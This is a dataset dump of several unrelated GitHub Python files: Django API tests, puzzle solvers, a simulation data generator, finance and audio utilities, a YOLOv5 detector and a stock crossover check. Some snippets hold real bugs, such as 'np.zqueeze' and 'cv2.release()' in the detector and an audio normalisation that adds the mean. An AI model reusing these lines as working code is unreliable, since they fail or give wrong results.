self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass TipAuthenticatedTests(APITestCase):\n def setUp(self):\n country = Country(name=\"Empire anarchique du Bachibouzouc\",\n population=12000)\n country.save()\n region = Region(name=\"Province dépendante du Bazar\",\n country=country)\n region.save()\n city1 = City(name=\"Trifouillis les Oies\", region=region,\n country=country,\n location=Point(42, 127), population=42)\n city1.save()\n city2 = City(name=\"Montcuq\", region=region,\n country=country,\n location=Point(42, 127), population=127)\n city2.save()\n data = {\n \"username\": \"toto\",\n \"email\": \"toto@test.com\",\n \"password\": \"pouetpouet\"\n }\n response = self.client.post(register_url, data, format=\"json\")\n\n data = {\n \"username\": \"toto\",\n \"password\": \"pouetpouet\",\n }\n response = self.client.post(login_url, data, format=\"json\")\n token = response.data[\"auth_token\"]\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n def test_get_default_empty(self):\n response = self.client.get(tips_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data[\"results\"]), 0)\n\n def test_create_tip_no_location(self):\n tip_data = {\n \"title\": \"test no location\",\n \"text\": \"testing with no location\"\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_create_local_tip(self):\n pos = Point(42, 127)\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(cities_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n cities = response.data[\"results\"]\n test_city = cities[0]\n\n tip_data = {\n \"title\": \"test local\",\n \"text\": \"testing local\",\n \"cities\": [\n {\n \"id\": test_city[\"id\"],\n \"name\": test_city[\"name\"],\n }],\n \"regions\": [\n {\n \"id\": test_city[\"region\"][\"id\"],\n \"name\": test_city[\"region\"][\"name\"],\n }],\n \"countries\": [\n {\n \"id\": test_city[\"country\"][\"id\"],\n \"name\": test_city[\"country\"][\"name\"],\n }],\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(response.data[\"results\"])\n test_tip = response.data[\"results\"][0]\n logger.debug(\"Tip: %s\", test_tip)\n self.assertEqual(test_tip[\"title\"], \"test local\")\n\n def test_create_tip_with_only_city(self):\n pos = Point(42, 127)\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(cities_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n cities = response.data[\"results\"]\n test_city = cities[0]\n\n tip_data = {\n \"title\": \"test local\",\n \"text\": \"testing local\",\n \"cities\": [\n {\n \"id\": test_city[\"id\"],\n \"name\": test_city[\"name\"],\n }],\n \"regions\": [],\n \"countries\": [],\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(response.data[\"results\"])\n test_tip = response.data[\"results\"][0]\n logger.debug(\"Tip: %s\", test_tip)\n self.assertEqual(test_tip[\"title\"], \"test local\")\n\n def test_create_tip_for_nearby_city(self):\n pos = Point(42, 127)\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(cities_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n cities = response.data[\"results\"]\n test_city = cities[1]\n\n tip_data = {\n \"title\": \"test local\",\n \"text\": \"testing local\",\n \"cities\": [\n {\n \"id\": test_city[\"id\"],\n \"name\": test_city[\"name\"],\n }],\n \"regions\": [],\n \"countries\": [],\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n response = self.client.get(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(response.data[\"results\"])\n test_tip = response.data[\"results\"][0]\n logger.debug(\"Tip: %s\", test_tip)\n self.assertEqual(test_tip[\"title\"], \"test local\")\n\n\n def test_update_tip(self):\n pos = Point(42, 127)\n data = {\n \"latitude\": pos.y,\n \"longitude\": pos.x\n }\n tip_data = {\n \"title\": \"test update\",\n \"text\": \"text before update\",\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n tip_id = response.data[\"id\"]\n\n response = self.client.get(tips_url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertTrue(response.data[\"results\"])\n\n tip = response.data[\"results\"][0]\n\n updated_text = \"Updated text\"\n tip[\"text\"] = updated_text\n\n tip_url = get_tip_put_url(tip_id)\n logger.debug(\"put tip url: %s\", tip_url)\n response = self.client.put(tip_url, tip, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n updated_tip_id = response.data[\"id\"]\n self.assertEqual(tip_id, updated_tip_id)\n self.assertEqual(response.data[\"text\"], updated_text)\n\n response = self.client.get(tip_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"text\"], updated_text)\n\n\nclass PermissionTests(APITestCase):\n \"\"\"Validate permissions.\n \"\"\"\n\n def setUp(self):\n self.user1 = TestUser(\"toto\", \"toto@test.com\", \"weshwesh\")\n self.user2 = TestUser(\"titi\", \"titi@test.com\", \"pouetpouet\")\n self.user1.register(self.client)\n self.user2.register(self.client)\n\n def test_tip_update(self):\n self.user1.login(self.client)\n tip_data = {\n \"title\": \"test auth\",\n \"text\": \"testing auth\"\n }\n response = self.client.post(tips_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n tip_id = response.data[\"id\"]\n\n self.user1.logout(self.client)\n self.user2.login(self.client)\n tip_data = {\n \"title\": \"test update with other user\",\n \"text\": \"this should fail\"\n }\n tip_url = get_tip_put_url(tip_id)\n response = self.client.put(tip_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n\n self.user2.logout(self.client)\n self.user1.login(self.client)\n tip_data = {\n \"title\": \"test update with correct user\",\n \"text\": \"this should succeed\"\n }\n tip_url = get_tip_put_url(tip_id)\n response = self.client.put(tip_url, tip_data, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n \n","repo_name":"paulez/localgreentips-backend","sub_path":"localgreentips/tips/tests/test_apis.py","file_name":"test_apis.py","file_ext":"py","file_size_in_byte":11070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7963354472","text":"def majorityElement(nums: [int]) -> int:\n #摩尔投票算法,本质是每次丢弃一对不同数字,则如果有主元素,则主元素最后必定会剩下\n n, count = nums[0], 1\n for i in nums[1:]:\n if count == 0:\n n = i\n count = 1\n elif i == n:\n count += 1\n else:\n count -= 1\n count = 0\n for i in nums:\n if i == n:\n count += 1\n if count > len(nums)//2:\n return n\n else:\n return -1\n\nprint(majorityElement([3,3,4]))","repo_name":"plusevenWang/LeetCode","sub_path":"面试题 17.10. 主要元素.py","file_name":"面试题 17.10. 主要元素.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42123949611","text":"#! /usr/bin/env python\n\n'''\nSolvers and example test cases for Day 14 of the Advent of Code 2021.\nProblem description: \n'''\n\nfrom collections import defaultdict\nfrom itertools import pairwise\nfrom typing import Dict, Iterable, List, Tuple\nimport unittest\n\n\ndef part1(lines: Iterable[str]) -> int:\n '''\n Solver for Day 14, part 1\n '''\n template_str, insertion_rules = read_input(lines)\n counts = element_count_after(10, list(template_str), insertion_rules)\n return counts[0][1] - counts[-1][1]\n\n\ndef part2(lines: Iterable[str]) -> int:\n '''\n Solver for Day 14, part 2\n '''\n template_str, insertion_rules = read_input(lines)\n counts = element_count_after(40, list(template_str), insertion_rules)\n return counts[0][1] - counts[-1][1]\n\n\ndef element_count_after(\n iterations: int,\n template: List[str],\n rules: Dict[Tuple[str, str], str]) \\\n -> List[Tuple[str, int]]:\n '''\n Computes the number of units of each element required to apply `rules` to\n `template` `iterations` times. The returned element-count list is sorted\n from most to least common.\n '''\n # The exact order of elements in the polymer doesn't matter, so rather than\n # generate the full sequence on each iteration (which would grow\n # exponentially), we'll just track how many of each pair it contains.\n pair_counts: Dict[Tuple[str, str], int] = defaultdict(int)\n for pair in pairwise(template):\n pair_counts[pair] += 1\n\n for _ in range(iterations):\n new_counts: Dict[Tuple[str, str], int] = defaultdict(int)\n for pair, count in pair_counts.items():\n new_counts[(pair[0], rules[pair])] += count\n new_counts[(rules[pair], pair[1])] += count\n pair_counts = new_counts\n\n # Count the number of each unit type appearing in the resulting polymer.\n # Because we're tracking pairs and not individual units, every unit is\n # double-counted, except for the first and last which only appear in one\n # pair each. Initialise both of these to one to compensate.\n unit_counts: Dict[str, int] = defaultdict(int)\n unit_counts[template[0]] += 1\n unit_counts[template[-1]] += 1\n for pair, count in pair_counts.items():\n unit_counts[pair[0]] += count\n unit_counts[pair[1]] += count\n counts_list = [(unit, count // 2) for unit, count in unit_counts.items()]\n counts_list.sort(key=lambda x: -x[1])\n return counts_list\n\n\ndef read_input(lines: Iterable[str]) -> Tuple[str, Dict[Tuple[str, str], str]]:\n '''\n Parses the problem input and returns a tuple containing the initial\n template and a dictionary of the insertion rules.\n '''\n lines_iter = iter(lines)\n template = next(lines_iter).strip()\n next(lines_iter) # Skip blank line between template and insertion rules\n\n insertion_rules = {}\n for line in lines_iter:\n pair, insertion = line.strip().split(' -> ')\n insertion_rules[(pair[0], pair[1])] = insertion\n\n return template, insertion_rules\n\n\nclass TestDay14(unittest.TestCase):\n '''\n Example test cases for Day 14, as specified in the problem description\n '''\n # pylint: disable=missing-function-docstring\n\n def setUp(self):\n self.data = [\n 'NNCB\\n',\n '\\n',\n 'CH -> B\\n',\n 'HH -> N\\n',\n 'CB -> H\\n',\n 'NH -> C\\n',\n 'HB -> C\\n',\n 'HC -> B\\n',\n 'HN -> C\\n',\n 'NN -> C\\n',\n 'BH -> H\\n',\n 'NC -> B\\n',\n 'NB -> B\\n',\n 'BN -> B\\n',\n 'BB -> N\\n',\n 'BC -> B\\n',\n 'CC -> N\\n',\n 'CN -> C'\n ]\n\n def test_part1_example(self):\n self.assertEqual(part1(self.data), 1588)\n\n def test_part2_example(self):\n self.assertEqual(part2(self.data), 2188189693529)\n","repo_name":"jamesconstable/aoc2021","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10432454461","text":"from data_handler import HDF5DataBuilder\nfrom PBSHM_mdof.system.simulation import Simulation\nfrom PBSHM_mdof.system.population import Population\nfrom PBSHM_mdof.system.mdof_system import MdofSystem\nfrom PBSHM_mdof.system.population_manipulator import PopulationManipulator\nfrom utils import resonance_frequency_computation\n\nfrom config import settings\nimport numpy as np\nfrom tqdm import tqdm\nimport h5py\nimport logging\n\nlogging.basicConfig(level=logging.INFO, \nformat='%(asctime)s - %(levelname)s - %(message)s',\nfilemode='w',filename='logs/generate_data.log')\n\ndt = settings.default['simulation']['dt'] \nt_end = settings.default['simulation']['t_end']\npath_dataset = settings.default['path']['generated_dataset']\npopulation_params_path= settings.default['path']['population_params']\n\ndef main():\n\n\n population = Population()\n population.load_population(population_params_path)\n logging.info(f'Loaded population from file {population_params_path}')\n pop_manipulator = PopulationManipulator(population)\n\n with h5py.File(path_dataset, 'w') as f:\n dh = HDF5DataBuilder(f)\n \n # Save healthy simulations and population parameters\n pop_grp = dh.set_save_population(population=population)\n std_latent = 20\n mean_latent = 50\n simulation_name='default_simulation'\n simu_grp = dh.set_save_simulation_params(pop_grp,simulation_name, dt=dt, t_end=t_end, std_latent=std_latent)\n\n # run experiments\n state = 'healthy'\n for i in tqdm(range(1200)):\n # parameter for the simulation\n amplitude = 5 * (-np.log(1-np.random.uniform(0, 1 )))**(1/1.9)+10\n anomaly_level=0\n loc = 7\n latent_value = np.random.normal(mean_latent, std_latent)\n experiment_name = f'experiment_{i}_{state}_{anomaly_level}'\n\n # do experiments\n\n \n attempt = 1\n run =True\n while run : \n requests = [{'type': 'environment', 'latent_value': latent_value, 'coefficients': 'load'}]\n population_affected = pop_manipulator.affect(requests)\n simulator = Simulation(population_affected, dt, t_end)\n simulation_data = simulator.simulation_white_noise(location=loc, amplitude=amplitude)\n if simulation_data is None:\n latent_value = np.random.normal(mean_latent, std_latent)\n amplitude = np.sqrt(np.square(np.random.normal(15, 5)) + 10)\n logging.info(f'Attempt {attempt} for simulation {i}')\n attempt += 1\n\n else:\n run=False \n\n \n # save experiments\n exp_grp = dh.set_save_experiment_params(simu_grp, experiment_name, latent_value, anomaly_level, state, loc, amplitude)\n dh.save_experiment_population_params(exp_grp, population_affected)\n dh.save_experiment_time_domain_data(exp_grp, simulation_data)\n \n logging.info(f'Saved simulation data for id={i}, latent_value={latent_value}')\n \n # Save anomalous simulations\n for anomaly_level in range(1, 14, 2):\n\n state = 'anomalous' \n for i in tqdm(range(200)):\n # parameter for the simulation\n ai = anomaly_level/100\n amplitude = 5 * (-np.log(1-np.random.uniform(0, 1)))**(1/1.9)+10\n loc = 7\n latent_value = np.random.normal(mean_latent, std_latent)\n experiment_name = f'experiment_{i}_{state}_{ai}'\n # do experiments\n attempt = 1\n run =True\n while run : \n requests = [{'type': 'environment', 'latent_value': latent_value, 'coefficients': 'load'},\n {'type': 'anomaly', 'location': 5, 'anomaly_size': ai, 'anomaly_type': 'stiffness'}]\n population_affected = pop_manipulator.affect(requests)\n simulator = Simulation(population_affected, dt, t_end)\n simulation_data = simulator.simulation_white_noise(location=loc, amplitude=amplitude)\n if simulation_data is None:\n latent_value = np.random.normal(mean_latent, std_latent)\n amplitude = np.sqrt(np.square(np.random.normal(15, 5)) + 10)\n logging.info(f'Attempt {attempt} for simulation {i}')\n attempt += 1\n\n else:\n run=False \n\n \n exp_grp = dh.set_save_experiment_params(simu_grp, experiment_name, latent_value, ai, state, loc, amplitude)\n dh.save_experiment_population_params(exp_grp, population_affected)\n dh.save_experiment_time_domain_data(exp_grp, simulation_data)\n \n logging.info(f'Saved simulation data for id={i},anomaly_level={ai}, latent_values={latent_value}')\n\nif __name__=='__main__':\n main()","repo_name":"YacineBelHadj/PBSHM_mdof","sub_path":"PBSHM_mdof/data/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"3264134300","text":"import yfinance as yf\r\nimport pandas as pd\r\n\r\n\r\ndef get_securities_adjusted_prices_from_yahoo(symbol_list, start_date, end_date, interval=\"1d\", to_csv=False):\r\n \"\"\"\r\n Uses the yfinance package (https://pypi.org/project/yfinance/) to fetch the historical prices\r\n of a list of securities.\r\n\r\n :param symbol_list:\r\n List of strings containing all securities + factors to fetch\r\n\r\n :param start_date:\r\n The start date for the historical data in format \"%Y-%m-%d\"\r\n\r\n :param end_date:\r\n The ending date for the historical data in format \"%Y-%m-%d\"\r\n\r\n :param interval:\r\n Interval between each data point. By default it is set to 1 day.\r\n\r\n :param to_csv:\r\n Boolean to save or not the resulting dataframe to csv format.\r\n\r\n :return: A dataframe containing the price time series of the closing prices for each security\r\n \"\"\"\r\n\r\n securities_df = yf.download(tickers=symbol_list, start=start_date, end=end_date, interval=interval)\r\n securities_df = securities_df.drop([\"Close\", \"High\", \"Low\", \"Open\", \"Volume\"], axis=1)\r\n securities_df.index = pd.to_datetime(securities_df.index, format='%Y%m%d')\r\n securities_df.columns = securities_df.columns.get_level_values(1)\r\n securities_df = securities_df.dropna(axis=1, thresh=0.9 * len(securities_df.index))\r\n securities_df = securities_df.interpolate(axis=0, method=\"linear\")\r\n securities_df = securities_df.fillna(method=\"bfill\")\r\n\r\n if to_csv:\r\n securities_df.to_csv(\"securities_and_factors.csv\")\r\n\r\n return securities_df\r\n\r\n\r\ndef create_sec_and_risk_df(securities_df, factors_symbols):\r\n \"\"\"\r\n Creates 2 dataframes containing respectively securities and factor risk prices\r\n\r\n :param securities_df: pandas.Dataframe\r\n Dataframe containing prices of all assets\r\n\r\n :param factors_symbols: List of str\r\n List of strings containing the risk factors symbols\r\n\r\n :return: 2 dataframes\r\n \"\"\"\r\n\r\n risk_df = securities_df[factors_symbols]\r\n risk_df.index = pd.to_datetime(risk_df.index, format='%Y-%m-%d')\r\n sec_df = securities_df.drop(factors_symbols, axis=1)\r\n sec_df.index = pd.to_datetime(sec_df.index, format='%Y-%m-%d')\r\n\r\n return sec_df, risk_df\r\n\r\n\r\ndef keep_random_columns_in_df(dataframe, n_to_keep, random_seed=None):\r\n \"\"\"\r\n Function that takes a dataframe of securities as parameter and returns\r\n a new dataframe after removing n securities\r\n\r\n :param dataframe: pandas.Dataframe\r\n dataframe containing the prices of different securities\r\n\r\n :param n_to_keep: int\r\n integer to specify the number of securities to keep from the dataframe\r\n\r\n :param random_seed:\r\n optional seed for rng\r\n\r\n :return: dataframe\r\n \"\"\"\r\n\r\n new_df = dataframe.sample(n=n_to_keep, axis=1, random_state=random_seed)\r\n\r\n return new_df\r\n","repo_name":"DavidCico/Factor-risk-model-with-principal-component-analysis","sub_path":"data_feed.py","file_name":"data_feed.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"2597694862","text":"import logging\nfrom typing import List, Optional\n\nimport torch\nimport librosa\nimport numpy as np\nimport scipy.signal\nimport sonosco.common.audio_tools as audio_tools\nimport sonosco.common.utils as utils\nimport sonosco.common.noise_makers as noise_makers\n\nwindows = {'hamming': scipy.signal.hamming, 'hann': scipy.signal.hann, 'blackman': scipy.signal.blackman,\n 'bartlett': scipy.signal.bartlett}\n\nLOGGER = logging.getLogger(__name__)\nMIN_STRETCH = 0.7\nMAX_STRETCH = 1.3\nMIN_PITCH = 0.7\nMAX_PITCH = 1.5\nMAX_SHIFT = 4000\n\n\nclass AudioDataProcessor:\n\n def __init__(self, window_stride, window_size, sample_rate, labels=\"abc\", normalize=False, augment=False, **kwargs):\n \"\"\"\n Dataset that loads tensors via a csv containing file paths to audio files and transcripts separated by\n a comma. Each new line is a different sample. Example below:\n /path/to/audio.wav,/path/to/audio.txt\n Args:\n window_stride: number of seconds to skip between each window\n window_size: number of seconds to use for a window of spectrogram\n sample_rate: sample rate of the recordings\n labels: string containing all the possible characters to map to\n normalize: apply standard mean and deviation normalization to audio tensor\n augment(default False): apply random tempo and gain perturbations\n \"\"\"\n self.window_stride = window_stride\n self.window_size = window_size\n self.window = windows.get(kwargs['window'], windows['hamming'])\n self.sample_rate = sample_rate\n self.labels_map = utils.labels_to_dict(labels)\n self.normalize = normalize\n self.augment = augment\n\n @property\n def window_stride_samples(self) -> int:\n return int(self.sample_rate * self.window_stride)\n\n @property\n def window_size_samples(self) -> int:\n return int(self.sample_rate * self.window_size)\n\n def retrieve_file(self, audio_path) -> (bytes, int):\n \"\"\"\n retrieve audio from file\n Args:\n audio_path: path to audio\n\n Returns: audio, sample_rate\n\n \"\"\"\n sound, sample_rate = librosa.load(audio_path, sr=self.sample_rate)\n return sound, sample_rate\n\n def augment_audio(self, sound: np.ndarray,\n stretch: bool = True,\n shift: bool = False,\n pitch: bool = True,\n noise: bool = True) -> np.ndarray:\n \"\"\"\n Augments the audio with given parameters/\n Args:\n sound:\n stretch:\n shift:\n pitch:\n noise:\n\n Returns: augmented audio\n\n \"\"\"\n augmented = audio_tools.stretch(sound, utils.random_float(MIN_STRETCH, MAX_STRETCH)) if stretch else sound\n augmented = audio_tools.shift(augmented, np.random.randint(MAX_SHIFT)) if shift else augmented\n augmented = audio_tools.pitch_shift(augmented, self.sample_rate,\n n_steps=utils.random_float(MIN_PITCH, MAX_PITCH)) if pitch else augmented\n\n if noise:\n noise_maker = noise_makers.GaussianNoiseMaker()\n augmented = noise_maker.add_noise(augmented) if noise else augmented\n\n return augmented\n\n def parse_audio_from_file(self, audio_path: str, raw: bool = False) -> torch.FloatTensor:\n \"\"\"\n Loads audio from file.\n Args:\n audio_path:\n raw:\n\n Returns: spectogram or raw audio\n\n \"\"\"\n sound, sample_rate = self.retrieve_file(audio_path)\n if raw:\n return sound\n\n spectogram = self.parse_audio(sound, sample_rate)\n\n return spectogram\n\n def parse_audio(self, sound: np.ndarray, sample_rate: int) -> torch.FloatTensor:\n \"\"\"\n Returns spectogram of given audio.\n Args:\n sound: audio to parse\n sample_rate: sample rate\n\n Returns: spectogram\n\n \"\"\"\n if sample_rate != self.sample_rate:\n raise ValueError(f\"The stated sample rate {self.sample_rate} and the factual rate {sample_rate} differ!\")\n\n if self.augment:\n sound = self.augment_audio(sound)\n\n complex_spectrogram = librosa.stft(sound,\n n_fft=self.window_size_samples,\n hop_length=self.window_stride_samples,\n win_length=self.window_size_samples,\n window=self.window)\n spectrogram, phase = librosa.magphase(complex_spectrogram)\n # S = log(S+1)\n spectrogram = np.log1p(spectrogram)\n spectrogram = torch.FloatTensor(spectrogram)\n\n if self.normalize:\n mean = spectrogram.mean()\n std = spectrogram.std()\n spectrogram.add_(mean)\n spectrogram.div_(std)\n\n return spectrogram\n\n def parse_transcript(self, transcript_path: str) -> List[Optional[any]]:\n \"\"\"\n Parse transcription from path.\n Args:\n transcript_path:\n\n Returns: transcript\n\n \"\"\"\n with open(transcript_path, 'r', encoding='utf8') as transcript_file:\n transcript = transcript_file.read().replace('\\n', '')\n # TODO: Is it fast enough?\n transcript = list(filter(lambda el: el is not None,\n [self.labels_map.get(x) for x in list(transcript)]))\n return transcript\n\n def parse_audio_for_inference(self, audio_path: str) -> (np.ndarray, torch.IntTensor):\n \"\"\"\n Return spectrogram and its length in a format used for inference.\n :param audio_path: Audio path.\n :return: spect [1, seq_length, freqs], lens [scalar]\n \"\"\"\n spect = self.parse_audio_from_file(audio_path)\n spect = spect.view(1, spect.size(0), spect.size(1)).transpose(1, 2)\n lens = torch.IntTensor([spect.shape[1]]).int()\n return spect, lens\n","repo_name":"Roboy/sonosco","sub_path":"sonosco/datasets/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"85"} +{"seq_id":"7805884656","text":"import torch\nimport cv2\nimport numpy as np\n\n# Model\nmodel = torch.hub.load('ultralytics/yolov5', 'custom',\n path = 'C:/Users/ceom1/Desktop/Facultad/9no Semestre/IA/DataSet_Chapas/YOLOv5/best.pt')\n\n# Images\nvideo = 'C:/Users/ceom1/Desktop/Facultad/9no Semestre/IA/DataSet_Chapas/YOLOv5/ch03_20230901103040.mp4' # batch of images\ncap = cv2.VideoCapture(video)\n\nwhile(cap.isOpened()):\n ret,frame = cap.read()\n # Inference\n results = model(frame)\n\n #Mostrar FPS\n cv2.imshow('Detector de Chapas', np.zqueeze(results.render()))\n\n #Leemos el teclado\n t = cv2.waitKey(5)\n if t == 27:\n break\ncv2.release()\ncv2.destroyAllWindows()","repo_name":"CarlosOliveri/Detector-de-chapas","sub_path":"Detector.py","file_name":"Detector.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"600181566","text":"# Exports all the document's nodes into files\n# * Top Level Groups => Features\n# * Nested Groups => Background or Scenarios\n\n\nfrom __future__ import print_function\nimport sys\n\n# START COMMON BLOCK\n# Flying Logic sys.path is preserved between script runs do not need to keep adding it every time.\n# although it is possible that the utils script has been changed so may require a reload\nreload_needed = False\nif 'scriptParentDirectory' in globals():\n if scriptParentDirectory not in sys.path:\n sys.path.append(\"/Library/Python/2.7/site-packages\")\n sys.path.append(scriptParentDirectory)\n else:\n # TODO: better detection, reload only necessary when actively editing the utils.py\n reload_needed = True\n# noinspection PyPep8\nimport utils\n\nif reload_needed:\n reload(utils)\n# END COMMON BLOCK\n\nutils._DEBUG = False\n\ndocument.clearSelection()\n\n\ndef extract_tags(group_element):\n utils.debug(\"Extracting Tags from \", pprint=group_element.user)\n try:\n tags = []\n if (group_element.user[\"tags\"] is not None and not group_element.user[\"tags\"] == \"\"):\n for t in group_element.user[\"tags\"].split(\",\"):\n tags.append({'location': {'column': 0, 'line': 0},\n 'name': t,\n 'type': 'Tag'})\n return tags\n except KeyError:\n return []\n\n\nfeatures = []\nelements = {}\nsections = {}\nedges = {}\n\n# Iterate though all the elements, extracting details that were set by\n# 'Import Feature File' to build a new in-memory representation\n# which can then be written out.\n#\n# NOTE: document.all does walk the trees so the information of relationships and order has to be re-established.\n#\nfor elem in document.all:\n if elem.isGroup:\n if elem.color == Color.GREEN:\n # TOP LEVEL FEATURE\n x = {'type': 'Feature',\n 'language': 'en',\n 'keyword': u'Feature',\n 'tags': extract_tags(elem),\n 'location': {'column': 0, 'line': 0},\n 'name': elem.title,\n 'description': elem.annotationEditor.plainText,\n 'children': []}\n for c in elem.children:\n x['children'].append(c.eid)\n features.append(x)\n else:\n # Background, Scenario or Scenario Outline.\n x = {'type': elem.user[\"type\"],\n 'location': {'column': 0, 'line': 0},\n 'steps': [],\n 'keyword': elem.user[\"type\"],\n 'description': elem.annotationEditor.plainText,\n 'name': ''\n }\n\n # Background has generic title and does not support tags.\n if elem.user[\"type\"] != \"Background\":\n x['name'] = elem.title\n x['tags'] = extract_tags(elem)\n\n for c in elem.children:\n x['steps'].append(c.eid)\n sections[elem.eid] = x\n elif elem.isEdge:\n src = elem.source\n tgt = elem.target\n if src.isEntity and tgt.isEntity:\n if src.eid not in edges:\n edges[src.eid] = [tgt.eid]\n else:\n edges[src.eid].append(tgt.eid)\n else:\n utils.debug(\"Unknown Edge\")\n elif elem.isEntity:\n # utils.debug(elem, elem.eid, elem.title, elem.isEdge, elem.user)\n x = {'type': 'Step',\n 'location': {'column': 0, 'line': 0},\n 'keyword': elem.user[\"keyword\"],\n 'text': elem.title}\n elements[elem.eid] = x\n else:\n utils.debug(\"unknown element\", elem)\n\nif len(features) > 1:\n # TODO: Handle Multiple Features in a single document\n # eg. Implement choice which feature to export?\n # or export all to different files in the same folder\n raise NotImplementedError(\"too many Features in document\")\n\nfeatureDoc = {'type': 'GherkinDocument', 'comments': [], 'feature': features[0]}\n\nfor selectedFeature in features:\n # noinspection PyRedeclaration\n seen_background_node = False\n sections_in_order = []\n for eid in selectedFeature[\"children\"]:\n s = sections[eid]\n if s[\"keyword\"] == \"Background\":\n if seen_background_node:\n raise NotImplementedError(\"Too many 'Background' nodes in Feature\")\n seen_background_node = True\n sections_in_order.insert(0, s)\n elif s[\"keyword\"] == \"Scenario\":\n sections_in_order.append(s)\n else:\n raise NotImplementedError(\"Regenerating section of type %r not implemented\" % (s[\"keyword\"]))\n\n selectedFeature[\"children\"] = sections_in_order\n\n # utils.debug(\"elements\", pprint=elements)\n # utils.debug(\"edges\", pprint=edges)\n\n # Now for each section take there nodes and sort them.\n sorted_nodes = utils.nodes_by_path(edges)\n for c in selectedFeature[\"children\"]:\n ret = []\n found = False\n for s in sorted_nodes:\n if s in c[\"steps\"]:\n found = True\n ret.append(elements[s])\n c[\"steps\"] = ret\n if not found:\n raise NotImplementedError(\"\"\"\n Unable to place all items in the section\n Ensure that there are no loops, and background is connected to at least one scenario\n \"\"\")\n\ntry:\n # TODO: Element may not exist (FL API missing a good way to check)\n if document.user[\"comments\"] is not None:\n featureDoc['comments'].append(document.user[\"comments\"])\nexcept KeyError:\n pass\n\nutils.debug(\"featureDoc is \", pprint=featureDoc)\n\nfeatureFileName = Application.askForFile(Application.lastAskDirectory, True)\nutils.write_gherkin_to_file(featureFileName, featureDoc)\n# utils.debug(\"Done\")\nApplication.alert(\"Feature file updated\")\n","repo_name":"KJR-AU/Behaviour-Modeling","sub_path":"scripts/regenerate_feature.py","file_name":"regenerate_feature.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"6802140750","text":"# 5日线上穿10日线,股价收盘价站上10日线\n\nimport tools.TimeUtil as timeUtil\nfrom stock.BaseStock import BaseStock\nfrom stock_analysis.Avg import Avg\nimport tools.PrintUtil as pt\nimport IndexConstants as constant\nfrom stock.StockDayData import StockDayData\n\n\n# 判断该股票在某天的股价,是否站上10日线,并且5日线向上突破10日线,形成金叉\nfrom stock_analysis.Boll import Boll\n\n\ndef analysis_stock(stock_code, stock_name, trade_data):\n base = BaseStock(\"base\")\n avg = Avg()\n avg_result = avg.get_avg(stock_code, stock_name)\n\n trade_data_avg = None\n try:\n trade_data_avg = avg_result[trade_data]\n except:\n pass\n\n if trade_data_avg is None:\n return None\n\n current_stock_data = base.get_pre_stock_data(stock_code, trade_data, 0)\n pre_stock_data = base.get_pre_stock_data(stock_code, trade_data, -1)\n\n if pre_stock_data is None:\n return None\n\n pre_trade_data_avg = avg_result[pre_stock_data.get_trade_date()]\n\n if pre_stock_data is not None \\\n and trade_data_avg[\"5\"] > trade_data_avg[\"10\"] \\\n and current_stock_data.get_close() > trade_data_avg[\"5\"] \\\n and pre_trade_data_avg[\"5\"] < pre_trade_data_avg[\"10\"] \\\n and pre_stock_data.get_close() < pre_trade_data_avg[\"10\"] \\\n and pre_stock_data.get_close() > pre_trade_data_avg[\"5\"]:\n return current_stock_data\n\n return None\n\n\nif 